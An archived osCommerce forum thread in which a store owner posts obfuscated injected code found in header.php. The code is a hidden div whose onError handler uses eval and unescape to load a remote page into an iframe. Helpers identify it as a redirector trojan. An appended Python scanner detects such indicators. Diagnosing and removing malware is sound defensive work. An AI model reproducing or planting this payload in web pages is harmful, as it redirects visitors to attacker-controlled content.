
This topic is now archived and is closed to further replies.

Tartanpig

Cleaning out after hack- Anyone recognise this code


I see this on the home page line 29 when I look at the source. I checked it out as there was a white box flashing up momentarily as the page loads. Does anyone recognise it and know where it is residing?

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8546" height="1" width="1"><img src="about:blank" onError='hlamtad=unescape("%27");xcjkk=eval("document.getElementById("+hlamtad+"ebajul"+hlamtad+").src=unescape("+hlamtad+"%68%74%74%70%3A%2F%2F"+hlamtad+")+document.getElementById("+hlamtad+"8546"+hlamtad+").id+unescape("+hlamtad+"%2E%69%6E%2F"+hlamtad+")+"+hlamtad+"1306058309"+hlamtad+"+unescape("+hlamtad+"%2E%70%68%70"+hlamtad+")");document.getElementById("ebajul").src=xcjkk' style="width:300;height:300;border:0px;"><iframe id="ebajul" src="about:blank"></iframe></div><!-- header_eof //-->


There are no iframes in standard osC; anything that contains that or eval must be deemed suspect code.


My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really necessary


My antivirus IDs it as a JavaScript redirector trojan horse.

Looks like it's at the end of the /includes/header.php file


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

My antivirus IDs it as a JavaScript redirector trojan horse.

Looks like it's at the end of the /includes/header.php file

Germ, the bottom of the header was where it was right enough. Cleaned it out and trawling for more bad stuff. Thanks again, Tartanpig


Yes, definitely malware related to this attack:

blog.sucuri.net/2010/11/malware-update-inininininininin-in-and-oscommerce.html

sucuri.net/malware/malware-entry-mwjs431

Thanks,
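The indicators named in this thread (an iframe, eval, unescape over percent-encoded text, a zero-size hidden box) turned into a file-tree check for the "trawling for more bad stuff" step. This is an added example, not code from any poster or from osCommerce; the indicator list, the two-hit threshold, the file extensions and SAMPLE are assumptions constructed here.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Indicators seen in this thread's snippet: iframe, eval(), unescape(),
# an onError handler, and a zero-size container hiding the markup.
INDICATORS = {
    "iframe": re.compile(r"<iframe\b", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "unescape": re.compile(r"\bunescape\s*\(", re.I),
    "onerror": re.compile(r"\bonerror\s*=", re.I),
    "zero-size": re.compile(r"width\s*:\s*0\s*;\s*height\s*:\s*0", re.I),
}
PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){2,}")  # two or more %XX escapes in a row
EXTENSIONS = {".php", ".inc", ".html", ".htm", ".js"}

# Constructed sample (not a real file): a header.php tail shaped like the post above.
SAMPLE = r'''<?php /* constructed sample */ ?>
<div style="overflow:hidden;width:0;height:0"><img src="about:blank"
 onError='u=eval("unescape(\"%68%74%74%70%3A%2F%2F\")+\"example.invalid\"")'>
<iframe id="f" src="about:blank"></iframe></div>'''

def decode_escapes(text):
    """Decode percent-encoded runs as plain text; nothing is executed."""
    return [unquote(m.group(0)) for m in PCT_RUN.finditer(text)]

def scan_file(path):
    """Return (sorted indicator names, decoded strings) for one file."""
    text = Path(path).read_text(errors="replace")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits, decode_escapes(text)

def scan_tree(root, min_hits=2):
    """Yield (path, hits, decoded) for web files matching >= min_hits indicators."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits, decoded = scan_file(path)
            if len(hits) >= min_hits:
                yield str(path), hits, decoded

def demo():
    """Scan a temporary tree holding one clean file and the constructed sample."""
    with tempfile.TemporaryDirectory() as root:
        inc = Path(root, "includes")
        inc.mkdir()
        (inc / "header.php").write_text(SAMPLE)
        (inc / "footer.php").write_text("<?php echo 'clean'; ?>\n")
        return [(Path(p).name, h, d) for p, h, d in scan_tree(root)]
```

Run `scan_tree()` against a copy of the store's document root; a hit is a lead for manual review against a known-good copy of the file, not proof of infection.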
